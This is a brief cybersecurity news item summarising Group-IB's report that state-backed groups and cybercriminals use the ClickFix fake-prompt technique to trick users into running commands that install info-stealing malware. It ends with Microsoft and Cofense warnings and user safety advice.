103/68 Monday, March 17, 2025
Cybersecurity firm Group-IB has revealed that since August 2024, state-sponsored hacker groups (APT groups) and cybercriminals have increasingly used the ClickFix technique in data-stealing malware attacks. ClickFix is a social engineering deception that leverages JavaScript on web pages to display fake system update alerts or reCAPTCHA verification prompts. When victims follow the instructions—such as pressing Win+R and pasting the copied code from their clipboard—malicious commands are executed immediately, leading to the installation of malware like Lumma, XWorm RAT, and DarkGate on their devices.
Group-IB reports that hackers distribute malware through multiple channels, including phishing emails, malicious ads, spam messages on social media, and compromised websites. Notably, MuddyWater (Iran) and APT28 (Russia) have been observed using ClickFix in their operations, targeting users of movie, gaming, and pirated software websites, as well as GitHub users and business organizations. First discovered in 2023, ClickFix has evolved into a more sophisticated threat by 2025.
Recently, Microsoft issued a warning about cybercriminals exploiting ClickFix in North America, Europe, Oceania, and Asia. Meanwhile, Cofense has detailed its use in spreading XWorm RAT malware. Experts caution that ClickFix is expected to become even more advanced, urging users to avoid following instructions from untrusted websites and use modern security solutions to minimize the risk of falling victim to such attacks.
Source https://www.securityweek.com/clickfix-widely-adopted-by-cybercriminals-apt-groups/
